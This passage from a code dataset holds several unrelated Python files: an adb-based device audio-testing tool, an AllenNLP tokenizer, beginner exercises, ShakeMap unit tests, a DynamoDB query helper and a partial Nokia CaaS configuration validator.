show_mods(self):\n for i in range(self.select_mod()):\n print('%d.%s' % (i, self.select_mod(i)))\n\n @staticmethod\n def save_memory(filename, _content):\n mp = str(filename[:filename.rfind('\\\\')])\n if not os.path.exists(mp):\n os.makedirs(mp)\n with open(filename, \"a+\") as f:\n f.write(_content)\n\n @staticmethod\n def log():\n global is_save_log\n if is_save_log:\n is_save_log = False\n for log in logs:\n log.close()\n print('\\033[1;36m关闭抓取日志\\033[0m\\n')\n else:\n logs.clear()\n is_save_log = True\n for i in range(len(ACTIVE_DEVICES)):\n logs.append(t.save_full_log(i))\n print('\\033[1;36m开始抓取日志\\033[0m\\n')\n return logs\n\n\nclass InputWatcher(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n self.start()\n\n def run(self):\n global stop_self, only_wakeup, restart_self, is_save_log\n while not stop_self and not restart_self:\n cmd = input()\n if cmd == 'c':\n DATA.clear()\n print('\\033[1;36m唤醒次数归零\\033[0m\\n')\n elif cmd == 'q':\n stop_self = True\n elif cmd == 's':\n restart_self = True\n DATA.clear()\n elif cmd == 'restart':\n t.restart_app()\n elif cmd == 'reboot':\n restart_self = True\n t.reboot_dev()\n elif cmd.startswith('p'):\n t.pull_audio(cmd)\n wp = 'status=1'\n for i, d in enumerate(ACTIVE_DEVICES):\n if mods[i] in (MOD_AINEMO_LAUNCHER,):\n file = 'data/log/test_info.txt'\n elif mods[i] in (MOD_AINEMO_1C, MOD_AINEMO_1S):\n file = 'data/local/aud_rec/alg_wake_info_0'\n elif mods[i] in (MOD_CW_LAUNCHER, MOD_CW_DEMO):\n file = 'data/local/tmp/aud_rec/alg_wake_info_0'\n elif mods[i] in (MOD_CW_BOX, ):\n file = 'data/local/aud_rec/alg_wake_*'\n else:\n file = ''\n wp = ''\n if file == '':\n continue\n res = \\\n os.popen(\n 'adb -s %s shell cat %s|grep %s |wc -l' % (d, file, wp)).readlines()[\n 0]\n print('设备%s唤醒次数为:%s' % (d, res.strip()))\n elif cmd == 'w':\n if only_wakeup:\n only_wakeup = False\n print('\\033[1;36m唤醒模式关闭\\033[0m\\n')\n\n else:\n only_wakeup = True\n print('\\033[1;36m唤醒模式开启\\033[0m\\n')\n elif cmd == 'log':\n t.log()\n\n\ndef show_help():\n os.system('clear')\n mhelp = '''选好设备类型、设备连接顺序后可进行导音频、重启等操作,在终端中输入指令后按回车键即可。\n 如果要使用模式15(esp32),需要在工具运行前传入参数,操作为:打开终端,将工具拖入,然后依次将日志文件拖入即可。\n \n 输入 w :切换唤醒/识别模式\n 输入 c :归零唤醒次数\n 输入 reboot :重启设备\n 输入 restart :重启APP\n 输入 q :退出程序\n 输入 s :停止当前模式并回到选择界面\n 输入 p [name] :导音频至'~/Desktop/audio/deviceSN/name'下,'deviceSN'为设备号,name缺省值为'audio'\n 输入 log :开始/关闭抓取日志,临时保存到~/Desktop/audio/deviceSN/deviceSN.txt。当执行导音频操作后,\n 将日志移动到音频路径下,并在临时路径下重新保存日志。\n \n百度Hi:郭玉强\n\\033[1;36m按回车键继续\\033[0m\n '''\n print(mhelp)\n input()\n os.system('clear')\n start_main()\n\n\ndef single_mod(mod):\n global CURRENT_MODULE\n CURRENT_MODULE = t.select_mod(mod)\n print('\\033[1;34m当前模式:' + CURRENT_MODULE + '\\033[0m')\n if CURRENT_MODULE == MOD_esp32:\n if len(sys.argv) == 1:\n raise ValueError\n for ag in sys.argv[1:]:\n ACTIVE_DEVICES.append(ag)\n elif CURRENT_MODULE != MOD_XIAODUBOX:\n dev = get_device_list()\n print(dev)\n if len(dev) == 1:\n order = '0'\n else:\n order = input('\\033[1;36m请输入设备连接顺序,以空格区分(0为起始)\\033[0m\\n').split()\n if not order:\n order = [x for x in range(len(dev))]\n for o in order:\n ACTIVE_DEVICES.append(dev[int(o)])\n else:\n ips = input('\\033[1;36m顺序输入设备ip,以逗号分割\\033[0m\\n')\n dev = ips.split(',')\n order = [i for i in range(len(dev))]\n for o in order:\n ACTIVE_DEVICES.append(dev[int(o)])\n for i in range(len(ACTIVE_DEVICES)):\n mods.append(CURRENT_MODULE)\n for i in range(len(ACTIVE_DEVICES)):\n ThreadLogcat(i)\n InputWatcher()\n\n\ndef multi_mod(ms):\n pm = ''\n\n for m in ms:\n pm += t.select_mod(m) + '、'\n print('\\033[1;34m当前模式:' + pm[:-1] + '\\033[0m')\n dev = get_device_list()\n print(dev)\n order = input('\\033[1;36m请输入设备连接顺序,以空格区分(0为起始)\\033[0m\\n').split()\n if not order:\n order = [x for x in range(len(dev))]\n if len(order) != len(ms):\n raise ValueError\n for o in order:\n ACTIVE_DEVICES.append(dev[int(o)])\n for mod in pm.split('、'):\n mods.append(mod)\n for i in range(len(ACTIVE_DEVICES)):\n ThreadLogcat(i)\n InputWatcher()\n\n\ndef start_main():\n global only_wakeup, CURRENT_MODULE, stop_self, restart_self, is_save_log, ACTIVE_DEVICES, CURRENT_MODULE\n ACTIVE_DEVICES.clear()\n logs.clear()\n mods.clear()\n stop_self = restart_self = False\n only_wakeup = is_save_log = False\n dev = get_device_list()[0]\n print(dev)\n CURRENT_MODULE = MOD_CW_DEMO\n ACTIVE_DEVICES.append(dev)\n mods.append(CURRENT_MODULE)\n ThreadLogcat(0)\n\n # t.show_mods()\n # print('\\033[1;33m输入 h 查看帮助\\033[0m')\n # try:\n # mod = input('\\033[1;36m请选择设备类型:\\033[0m')\n # if mod == 'h':\n # show_help()\n # elif mod == 'q':\n # t.kill_self()\n # elif len(mod.split()) == 1:\n # single_mod(mod)\n # else:\n # multi_mod(mod.split())\n # except (ValueError, IndexError):\n # os.system('clear')\n # print('\\033[1;31m错误:输入不合法!!!重新输入 \\033[0m')\n # start_main()\n\n\nif __name__ == '__main__':\n t = Tools()\n try:\n # os.system('clear')\n start_main()\n except KeyboardInterrupt:\n pass\n except Exception as e:\n print(repr(e))\n","sub_path":"com/guo/AGR_for_Mac_tmp.py","file_name":"AGR_for_Mac_tmp.py","file_ext":"py","file_size_in_byte":38525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"125005865","text":"import logging\nfrom typing import List\n\nfrom overrides import overrides\nfrom transformers.tokenization_auto import AutoTokenizer\n\nfrom allennlp.data.tokenizers.token import Token\nfrom allennlp.data.tokenizers.tokenizer import Tokenizer\n\nlogger = logging.getLogger(__name__)\n\n\n@Tokenizer.register(\"pretrained_transformer\")\nclass PretrainedTransformerTokenizer(Tokenizer):\n \"\"\"\n A ``PretrainedTransformerTokenizer`` uses a model from HuggingFace's\n ``transformers`` library to tokenize some input text. This often means wordpieces\n (where ``'AllenNLP is awesome'`` might get split into ``['Allen', '##NL', '##P', 'is',\n 'awesome']``), but it could also use byte-pair encoding, or some other tokenization, depending\n on the pretrained model that you're using.\n\n We take a model name as an input parameter, which we will pass to\n ``AutoTokenizer.from_pretrained``.\n\n We also add special tokens relative to the pretrained model and truncate the sequences.\n\n This tokenizer also indexes tokens and adds the indexes to the ``Token`` fields so that\n they can be picked up by ``PretrainedTransformerIndexer``.\n\n Parameters\n ----------\n model_name : ``str``\n The name of the pretrained wordpiece tokenizer to use.\n add_special_tokens: ``bool``, optional, (default=True)\n If set to ``True``, the sequences will be encoded with the special tokens relative\n to their model.\n max_length: ``int``, optional (default=None)\n If set to a number, will limit the total sequence returned so that it has a maximum length.\n If there are overflowing tokens, those will be added to the returned dictionary\n stride: ``int``, optional (default=0)\n If set to a number along with max_length, the overflowing tokens returned will contain some tokens\n from the main sequence returned. The value of this argument defines the number of additional tokens.\n truncation_strategy: ``str``, optional (default='longest_first')\n String selected in the following options:\n - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length\n starting from the longest one at each token (when there is a pair of input sequences)\n - 'only_first': Only truncate the first sequence\n - 'only_second': Only truncate the second sequence\n - 'do_not_truncate': Do not truncate (raise an error if the input sequence is longer than max_length)\n\n Argument descriptions are from\n https://github.com/huggingface/transformers/blob/155c782a2ccd103cf63ad48a2becd7c76a7d2115/transformers/tokenization_utils.py#L691\n \"\"\"\n\n def __init__(\n self,\n model_name: str,\n add_special_tokens: bool = True,\n max_length: int = None,\n stride: int = 0,\n truncation_strategy: str = \"longest_first\",\n ) -> None:\n self._tokenizer = AutoTokenizer.from_pretrained(model_name)\n self._add_special_tokens = add_special_tokens\n self._max_length = max_length\n self._stride = stride\n self._truncation_strategy = truncation_strategy\n\n def _tokenize(self, sentence_1: str, sentence_2: str = None):\n \"\"\"\n This method works on both sentence and sentence pair.\n \"\"\"\n # TODO(mattg): track character offsets. Might be too challenging to do it here, given that\n # ``transformers``` is dealing with the whitespace...\n\n encoded_tokens = self._tokenizer.encode_plus(\n text=sentence_1,\n text_pair=sentence_2,\n add_special_tokens=self._add_special_tokens,\n max_length=self._max_length,\n stride=self._stride,\n truncation_strategy=self._truncation_strategy,\n return_tensors=None,\n )\n # token_ids containes a final list with ids for both regualr and special tokens\n token_ids, token_type_ids = encoded_tokens[\"input_ids\"], encoded_tokens[\"token_type_ids\"]\n\n tokens = []\n for token_id, token_type_id in zip(token_ids, token_type_ids):\n token_str = self._tokenizer.convert_ids_to_tokens(token_id, skip_special_tokens=False)\n tokens.append(Token(text=token_str, text_id=token_id, type_id=token_type_id))\n\n return tokens\n\n def tokenize_sentence_pair(self, sentence_1: str, sentence_2: str) -> List[Token]:\n \"\"\"\n This methods properly handels a pair of sentences.\n \"\"\"\n return self._tokenize(sentence_1, sentence_2)\n\n @overrides\n def tokenize(self, text: str) -> List[Token]:\n \"\"\"\n This method only handels a single sentence (or sequence) of text.\n Refer to the ``tokenize_sentence_pair`` method if you have a sentence pair.\n \"\"\"\n return self._tokenize(text)\n","sub_path":"allennlp/data/tokenizers/pretrained_transformer_tokenizer.py","file_name":"pretrained_transformer_tokenizer.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"4103497","text":"# Write a program to prompt the user for hours and rate per hour using input to compute gross pay.\n# Award time-and-a-half for the hourly rate for all hours worked above 40 hours.\n# Put the logic to do the computation of time-and-a-half in a function called computepay() and\n# use the function to do the computation. The function should return a value.\n# Use 45 hours and a rate of 10.50 per hour to test the program (the pay should be 498.75).\n# You should use input to read a string and float() to convert the string to a number.\n# Do not name your variable sum or use the sum() function.\n\ndef computepay(hours: float, rate: float):\n if hours <= 40:\n return hours * rate\n elif hours > 40:\n return ((hours - 40) * rate * 1.5) + ( 40 * rate )\n\nhours = float(input('Hours: '))\nrate = float(input('Rate / Hour: '))\npay = computepay(hours, rate)\nprint(pay)\n","sub_path":"01. Getting Started/05_FuncationSample.py","file_name":"05_FuncationSample.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"589814235","text":"import unittest\n\nfrom eqep.data.eqdata import EQData\nfrom eqep.persisting.kml_saver import *\nfrom eqep.shakemap.display.scales import *\nfrom eqep.shakemap.shakemap_factory import create_shakemap\nfrom eqep.test.utils import img_cmp\n\n\nclass ShakeFactoryTest(unittest.TestCase):\n \"\"\"\n Unit-tests for `create_shakemap()`\n \"\"\"\n\n REF_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'res',\n 'factory')\n\n # test-ShakeMap parameters\n names = ['ARSA', 'CONA', 'JAVC', 'KBA', 'KRUC',\n 'MOA', 'MORC', 'MYKA', 'OBKA', 'SOKA'] # the names of the stations\n longs = np.array([15.523, 15.862, 17.671, 13.344, 16.395, 14.266, 17.543,\n 13.641, 14.549, 15.033])\n lats = np.array([47.250, 47.928, 48.859, 47.078, 49.062, 47.849, 49.777,\n 46.630, 46.509, 46.678])\n values = np.array([33923, 76942, 18659, 5694, 89586, 15813, 58516,\n 2933, 7372, 7487])\n data = EQData(values, longs, lats, names)\n\n def test_simple(self):\n file = 'shakemap.png'\n\n sm = create_shakemap(self.data, 'multiquadric', 'blue_red', 'plain',\n (100, 100), (13, 18, 46, 50), (10, 8))\n\n sm.calculate()\n sm.save_img(file)\n\n cmp = img_cmp(file, os.path.join(self.REF_DIR,\n 'ref_simple.png'))\n os.remove(file)\n\n self.assertTrue(cmp)\n\n def test_auto(self):\n file = 'shakemap.png'\n\n sm = create_shakemap(self.data, 'multiquadric', 'blue_red', 'plain')\n\n sm.calculate()\n sm.save_img(file)\n\n cmp = img_cmp(file, os.path.join(self.REF_DIR,\n 'ref_auto.png'))\n os.remove(file)\n\n self.assertTrue(cmp)\n\n def test_styles(self):\n file = 'shakemap.png'\n\n sm = create_shakemap(self.data, 'multiquadric', 'blue_red',\n 'plain, labels')\n\n sm.calculate()\n sm.save_img(file)\n\n cmp = img_cmp(file, os.path.join(self.REF_DIR, 'ref_styles.png'))\n os.remove(file)\n\n self.assertTrue(cmp)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"eqep/test/test_factory.py","file_name":"test_factory.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"271317389","text":"# mr Miyagi trainee ##projct\n# Ask for user input and depending on the response, mr Miyagi will respond.\n#\n# prompt user for input\n# Evaluate each input and print the appropriate responses\n# Follow these rules:\n#\n# every time you ask a question --> Mr. Miyagi responde with\n # --> 'questions are wise, but for now. Wax on, and Wax off!' (DONE)\n# every statement/question must start with Sensei, otherwise:\n # --> 'You are smart, but not wise - address me as Sensei please' (DONE)\n# every time you mention 'block' or 'blocking' --> Mr. Miyagi responde with\n # --> 'Remeber, best block, not to be there..' (DONE)\n# anything else you say:\n # --> 'do not lose focus. Wax on. Wax off.' (DONE)\n\n# Make it so you keep playing until we say: 'Sensei, I am at peace'\n # --> 'Sometimes, what heart know, head forget' (DONE)\n\nwhile True:\n response = input(\"Speak to Mr. Miyagi. You can exit by saying 'Sensei, I am at peace': \").lower().strip() # user response\n\n if response.find('sensei') == -1:\n print('You are smart, but not wise - address me as Sensei please') # checks to see if sentence begins with 'Sensei'\n\n elif 'block' in response:\n print('Remember, best block, not to be there.') # if block or blocking in response, a specific reply is given\n\n elif response == 'sensei, i am at peace':\n print('Sometimes, what heart know, head forget') # user response breaks the loop\n break\n\n elif response[-1] == '?':\n print('Questions are wise, but for now. Wax on, and Wax off!') # if sentence ends in '?', a specific reply is given\n\n else:\n print(\"Do not lose focus. Wax on. Wax off.\")\n\n","sub_path":"exercise_miyagi.py","file_name":"exercise_miyagi.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"73580938","text":"import boto3\nimport DBAccessKey\nfrom boto3.dynamodb.conditions import Key, Attr\nimport json\nimport decimal\n\naccess_key_id_global=DBAccessKey.DBAccessKey.access_key_id_global\nsecret_access_key_global=DBAccessKey.DBAccessKey.secret_access_key_global\n\n\nclass DecimalEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n if o % 1 > 0:\n return float(o)\n else:\n return int(o)\n return super(DecimalEncoder, self).default(o)\n\n\nclass Filter_db:\n\n response = []\n\n def get_DB(Ref_no, controller):\n\n print(\"Ref no is \"+Ref_no)\n\n dynamodb = boto3.resource('dynamodb', region_name='ap-southeast-2', aws_access_key_id=access_key_id_global,\n aws_secret_access_key=secret_access_key_global)\n table = dynamodb.Table('ME_CFS_DB')\n\n response = table.query(\n KeyConditionExpression=Key('Reference_No').eq(Ref_no)\n )\n if (response['Items']):\n print(\"start of filter\")\n for i in response['Items']:\n #print(i['Reference_No'], \":\", i['Date_Time']) #print selected attributes\n print(json.dumps(i, cls=DecimalEncoder))#print whole database\n\n print(\"end of filter\")\n controller.show_frame(\"FilterPage\")\n\n else:\n print(response['Items'])\n print(\"It is empty\")\n\n\n\n","sub_path":"Filter.py","file_name":"Filter.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"296433486","text":"#!/usr/bin/python\n# Copyright 2019 Nokia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport re\nimport base64\nimport logging\nimport ipaddr\nfrom cmframework.apis import cmvalidator\nfrom cmdatahandlers.api import validation\nfrom cmdatahandlers.api import configerror\n\n\nclass CaasValidationError(configerror.ConfigError):\n def __init__(self, description):\n configerror.ConfigError.__init__(\n self, 'Validation error in caas_validation: {}'.format(description))\n\n\nclass CaasValidationUtils(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def check_key_in_dict(key, dictionary):\n if key not in dictionary:\n raise CaasValidationError(\"{} cannot be found in {} \".format(key, dictionary))\n\n def get_every_key_occurrence(self, var, key):\n if hasattr(var, 'iteritems'):\n for k, v in var.iteritems():\n if k == key:\n yield v\n if isinstance(v, dict):\n for result in self.get_every_key_occurrence(v, key):\n yield result\n elif isinstance(v, list):\n for d in v:\n for result in self.get_every_key_occurrence(d, key):\n yield result\n\n @staticmethod\n def is_optional_param_present(key, dictionary):\n if key not in dictionary:\n logging.info('{} key is not in the config dictionary, since this is an optional '\n 'parameter, validation is skipped.'.format(key))\n return False\n if not dictionary[key]:\n logging.info('Although {} key is in the config dictionary the correspondig value is '\n 'empty, since this is an optional parametery, '\n 'validation is skipped.'.format(key))\n return False\n return True\n\n\nclass CaasValidation(cmvalidator.CMValidator):\n SUBSCRIPTION = r'^cloud\\.caas|cloud\\.hosts|cloud\\.networking|cloud\\.network_profiles$'\n CAAS_DOMAIN = 'cloud.caas'\n HOSTS_DOMAIN = 'cloud.hosts'\n NETW_DOMAIN = 'cloud.networking'\n NETPROF_DOMAIN = 'cloud.network_profiles'\n\n SERV_PROF = 'service_profiles'\n CAAS_PROFILE_PATTERN = 'caas_master|caas_worker'\n CIDR = 'cidr'\n\n DOCKER_SIZE_QUOTA = \"docker_size_quota\"\n DOCKER_SIZE_QUOTA_PATTERN = r\"^\\d*[G,M,K]$\"\n\n HELM_OP_TIMEOUT = \"helm_operation_timeout\"\n\n DOCKER0_CIDR = \"docker0_cidr\"\n\n OAM_CIDR = \"oam_cidr\"\n\n INSTANTIATION_TIMEOUT = \"instantiation_timeout\"\n\n ENCRYPTED_CA = \"encrypted_ca\"\n ENCRYPTED_CA_KEY = \"encrypted_ca_key\"\n\n CLUSTER_NETS = 'cluster_networks'\n TENANT_NETS = 'tenant_networks'\n\n BLOG_FORWARDING = \"infra_log_store\"\n LOG_FORWARDING = \"log_forwarding\"\n URL_PORT_PATTERN = r\"^(?:https?|udp|tcp):(?:\\/\\/)(?:((?:[\\w\\.-]+|\" \\\n r\"\\[(([1-9a-f][0-9a-f]{0,3}|\\:)\\:[1-9a-f][0-9a-f]{0,3}){0,7}\\])\\:[0-9]+))\"\n FLUENTD_PLUGINS = ['elasticsearch', 'remote_syslog']\n INFRA_LOG_FLUENTD_PLUGINS = ['elasticsearch', 'remote_syslog']\n LOG_FW_STREAM = ['stdout', 'stderr', 'both']\n\n DOMAIN_NAME = \"dns_domain\"\n DOMAIN_NAME_PATTERN = r\"^[a-z0-9]([a-z0-9-\\.]{0,253}[a-z0-9])?$\"\n\n def __init__(self):\n cmvalidator.CMValidator.__init__(self)\n self.validation_utils = validation.ValidationUtils()\n self.conf = None\n self.caas_conf = None\n self.caas_utils = CaasValidationUtils()\n\n def get_subscription_info(self):\n return self.SUBSCRIPTION\n\n def validate_set(self, props):\n if not self.is_caas_mandatory(props):\n logging.info(\"{} not found in {}, caas validation is not needed.\".format(\n self.CAAS_PROFILE_PATTERN, self.HOSTS_DOMAIN))\n return\n self.props_pre_check(props)\n self.validate_docker_size_quota()\n self.validate_helm_operation_timeout()\n self.validate_docker0_cidr(props)\n self.validate_oam_cidr(props)\n self.validate_instantiation_timeout()\n self.validate_encrypted_ca(self.ENCRYPTED_CA)\n self.validate_encrypted_ca(self.ENCRYPTED_CA_KEY)\n self.validate_log_forwarding()\n self.validate_networks(props)\n self.validate_dns_domain()\n\n def _get_conf(self, props, domain):\n if props.get(domain):\n conf_str = props[domain]\n else:\n conf_str = self.get_plugin_client().get_property(domain)\n return json.loads(conf_str)\n\n def is_caas_mandatory(self, props):\n if not isinstance(props, dict):\n raise CaasValidationError('The given input: {} is not a dictionary!'.format(props))\n hosts_conf = self._get_conf(props, self.HOSTS_DOMAIN)\n service_profiles = self.caas_utils.get_every_key_occurrence(hosts_conf, self.SERV_PROF)\n pattern = re.compile(self.CAAS_PROFILE_PATTERN)\n for profile in service_profiles:\n if filter(pattern.match, profile):\n return True\n return False\n\n def props_pre_check(self, props):\n self.caas_conf = self._get_conf(props, self.CAAS_DOMAIN)\n self.conf = {self.CAAS_DOMAIN: self.caas_conf}\n if not self.caas_conf:\n raise CaasValidationError('{} is an empty dictionary!'.format(self.conf))\n\n def validate_docker_size_quota(self):\n if not self.caas_utils.is_optional_param_present(self.DOCKER_SIZE_QUOTA, self.caas_conf):\n return\n if not re.match(self.DOCKER_SIZE_QUOTA_PATTERN, self.caas_conf[self.DOCKER_SIZE_QUOTA]):\n raise CaasValidationError(\n '{} is not a valid {}!'.format(self.caas_conf[self.DOCKER_SIZE_QUOTA],\n self.DOCKER_SIZE_QUOTA))\n\n def validate_helm_operation_timeout(self):\n if not self.caas_utils.is_optional_param_present(self.HELM_OP_TIMEOUT, self.caas_conf):\n return\n if not isinstance(self.caas_conf[self.HELM_OP_TIMEOUT], int):\n raise CaasValidationError(\n '{}:{} is not an integer'.format(self.HELM_OP_TIMEOUT,\n self.caas_conf[self.HELM_OP_TIMEOUT]))\n\n def get_netw_obj(self, subnet, parameter):\n try:\n return ipaddr.IPNetwork(subnet)\n except ValueError as exc:\n raise CaasValidationError('{} is an invalid subnet address: {}'.format(\n parameter, exc))\n\n def check_cidr_overlaps_with_netw_subnets(self, cidr_in, props, parameter):\n netw_conf = self._get_conf(props, self.NETW_DOMAIN)\n cidrs = self.caas_utils.get_every_key_occurrence(netw_conf, self.CIDR)\n for cidr in cidrs:\n if cidr_in.overlaps(ipaddr.IPNetwork(cidr)):\n raise CaasValidationError(\n 'CIDR configured for {} shall be an unused IP range, '\n 'but it overlaps with {} from {}.'.format(parameter, cidr,\n self.NETW_DOMAIN))\n def check_oam_cidr_prefix(self, cidr_obj):\n if ipaddr.IPNetwork(cidr_obj).prefixlen != 16:\n raise CaasValidationError('Wrong subnet size in caas.oam_cidr parameter. '\n 'The currently supported subnet size is 16')\n\n def validate_docker0_cidr(self, props):\n if not self.caas_utils.is_optional_param_present(self.DOCKER0_CIDR, self.caas_conf):\n return\n docker0_cidr_obj = self.get_netw_obj(self.caas_conf[self.DOCKER0_CIDR], self.DOCKER0_CIDR)\n self.check_cidr_overlaps_with_netw_subnets(docker0_cidr_obj, props, self.DOCKER0_CIDR)\n\n def validate_oam_cidr(self, props):\n if not self.caas_utils.is_optional_param_present(self.OAM_CIDR, self.caas_conf):\n return\n oam_cidr_obj = self.get_netw_obj(self.caas_conf[self.OAM_CIDR], self.OAM_CIDR)\n self.check_cidr_overlaps_with_netw_subnets(oam_cidr_obj, props, self.OAM_CIDR)\n self.check_oam_cidr_prefix(oam_cidr_obj)\n\n def validate_instantiation_timeout(self):\n if not self.caas_utils.is_optional_param_present(self.INSTANTIATION_TIMEOUT,\n self.caas_conf):\n return\n if not isinstance(self.caas_conf[self.INSTANTIATION_TIMEOUT], int):\n raise CaasValidationError('{}:{} is not an integer'.format(\n self.INSTANTIATION_TIMEOUT, self.caas_conf[self.INSTANTIATION_TIMEOUT]))\n\n def validate_encrypted_ca(self, enc_ca):\n self.caas_utils.check_key_in_dict(enc_ca, self.caas_conf)\n enc_ca_str = self.caas_conf[enc_ca][0]\n if not enc_ca_str:\n raise CaasValidationError('{} shall not be empty !'.format(enc_ca))\n try:\n base64.b64decode(enc_ca_str)\n except TypeError as exc:\n raise CaasValidationError('Invalid {}: {}'.format(enc_ca, exc))\n\n def validate_log_forwarding(self):\n # pylint: disable=too-many-branches\n if self.caas_utils.is_optional_param_present(self.BLOG_FORWARDING, self.caas_conf):\n if self.caas_conf[self.BLOG_FORWARDING] not in self.INFRA_LOG_FLUENTD_PLUGINS:\n raise CaasValidationError('\"{}\" property not valid! '\n 'Choose from {}!'.format(self.BLOG_FORWARDING,\n self.INFRA_LOG_FLUENTD_PLUGINS))\n if self.caas_utils.is_optional_param_present(self.LOG_FORWARDING, self.caas_conf):\n log_fw_list = self.caas_conf[self.LOG_FORWARDING]\n if log_fw_list:\n url_d = dict()\n url_s = set()\n for list_item in log_fw_list:\n self.caas_utils.check_key_in_dict('namespace', list_item)\n if list_item['namespace'] == 'kube-system':\n raise CaasValidationError(\n 'You can\\'t set \"kube-system\" as namespace in \"{}\"!'.format(\n self.LOG_FORWARDING))\n self.caas_utils.check_key_in_dict('target_url', list_item)\n if not list_item['target_url'] or not re.match(self.URL_PORT_PATTERN,\n list_item['target_url']):\n raise CaasValidationError(\n '\"target_url\" property {} not valid!'.format(list_item['target_url']))\n if not url_d:\n url_d[list_item['namespace']] = list_item['target_url']\n if list_item['namespace'] in url_d:\n if list_item['target_url'] in url_s:\n raise CaasValidationError('There can\\'t be multiple rules for the same '\n 'target_url for the same {} '\n 'namespace!'.format(list_item['namespace']))\n else:\n url_s.add(list_item['target_url'])\n url_d[list_item['namespace']] = url_s\n else:\n url_d[list_item['namespace']] = list_item['target_url']\n if self.caas_utils.is_optional_param_present('plugin', list_item) and list_item[\n 'plugin'] not in self.FLUENTD_PLUGINS:\n raise CaasValidationError(\n '\"plugin\" property not valid! Choose from {}'.format(\n self.FLUENTD_PLUGINS))\n if self.caas_utils.is_optional_param_present('stream', list_item) and list_item[\n 'stream'] not in self.LOG_FW_STREAM:\n raise CaasValidationError(\n '\"stream\" property not valid! Choose from {}'.format(\n self.LOG_FW_STREAM))\n\n def validate_networks(self, props):\n caas_nets = []\n for nets_key in [self.CLUSTER_NETS, self.TENANT_NETS]:\n if self.caas_utils.is_optional_param_present(nets_key, self.caas_conf):\n if not isinstance(self.caas_conf[nets_key], list):\n raise CaasValidationError('{} is not a list'.format(nets_key))\n if len(set(self.caas_conf[nets_key])) != len(self.caas_conf[nets_key]):\n raise CaasValidationError('{} has duplicate entries'.format(nets_key))\n caas_nets.extend(self.caas_conf[nets_key])\n if len(set(caas_nets)) != len(caas_nets):\n raise CaasValidationError('{} and {} must be distinct, but same entries are '\n 'found from both lists'.format(self.CLUSTER_NETS,\n self.TENANT_NETS))\n self._validate_homogenous_net_setup(props, caas_nets)\n\n def _validate_homogenous_net_setup(self, props, caas_nets):\n # Validate homogenous CaaS provider network setup\n # pylint: disable=too-many-locals,too-many-nested-blocks\n hosts_conf = self._get_conf(props, self.HOSTS_DOMAIN)\n netprof_conf = self._get_conf(props, self.NETPROF_DOMAIN)\n net_iface_map = {}\n for net in caas_nets:\n net_iface_map[net] = None\n for host, host_conf in hosts_conf.iteritems():\n # Validate only nodes that can host containerized workloads\n if ('caas_worker' in host_conf[self.SERV_PROF] or\n ('caas_master' in host_conf[self.SERV_PROF] and\n 'compute' not in host_conf[self.SERV_PROF])):\n # Validating CaaS network 'net' mapping in 'host'\n profiles = host_conf.get('network_profiles')\n if isinstance(profiles, list) and profiles:\n net_prof = netprof_conf.get(profiles[0])\n if net_prof is not None:\n ifaces = net_prof.get('provider_network_interfaces', {})\n caas_provider_interfaces = self._filter_provider_networks_by_type(\n self._filter_provider_networkinterfaces_by_net(ifaces, net), 'caas')\n sriov_networks = net_prof.get('sriov_provider_networks', {})\n caas_sriov_networks_present = bool(\n net in sriov_networks and\n sriov_networks[net].get('type', \"\") == 'caas')\n if not caas_provider_interfaces and not caas_sriov_networks_present:\n raise CaasValidationError('CaaS network {} missing from host {}'\n .format(net, host))\n if caas_provider_interfaces:\n self._validate_homogenous_provider_net_setup(\n net_iface_map, net, ifaces)\n if caas_sriov_networks_present:\n self._validate_homogenous_sriov_provider_net_setup(\n net_iface_map, net, sriov_networks)\n\n @staticmethod\n def _filter_provider_networks_by_type(profile, net_type):\n return {name: network for name, network in profile.iteritems()\n if network.get('type', \"\") == net_type}\n\n @staticmethod\n def _filter_provider_networkinterfaces_by_net(provider_interfaces, provider_net):\n return {iface: data for iface, data in provider_interfaces.iteritems()\n if provider_net in data.get('provider_networks', [])}\n\n @staticmethod\n def _validate_homogenous_provider_net_setup(net_iface_map, net, ifaces):\n is_caas_network_present = False\n for iface, data in ifaces.iteritems():\n net_type = data.get('type')\n networks = data.get('provider_networks', [])\n if net in networks and net_type == 'caas':\n is_caas_network_present = True\n if net_iface_map[net] is None:\n net_iface_map[net] = iface\n elif net_iface_map[net] != iface:\n msg = 'CaaS network {} mapped to interface {} in one host '\n msg += 'and interface {} in another host'\n raise CaasValidationError(msg.format(net, iface,\n net_iface_map[net]))\n break\n return is_caas_network_present\n\n @staticmethod\n def _validate_homogenous_sriov_provider_net_setup(net_iface_map, net, sriov_networks):\n is_caas_network_present = False\n sriov_provider_net = sriov_networks.get(net, {})\n if sriov_provider_net and sriov_provider_net.get('type') == 'caas':\n interfaces = sriov_provider_net.get('interfaces', [])\n tenant_interfaces = net_iface_map.get(net)\n already_used_ifaces = [set(x).intersection(interfaces)\n for x in net_iface_map.itervalues()\n if x and isinstance(x, list)]\n if tenant_interfaces is None and interfaces:\n net_iface_map[net] = interfaces\n is_caas_network_present = True\n elif already_used_ifaces:\n msg = 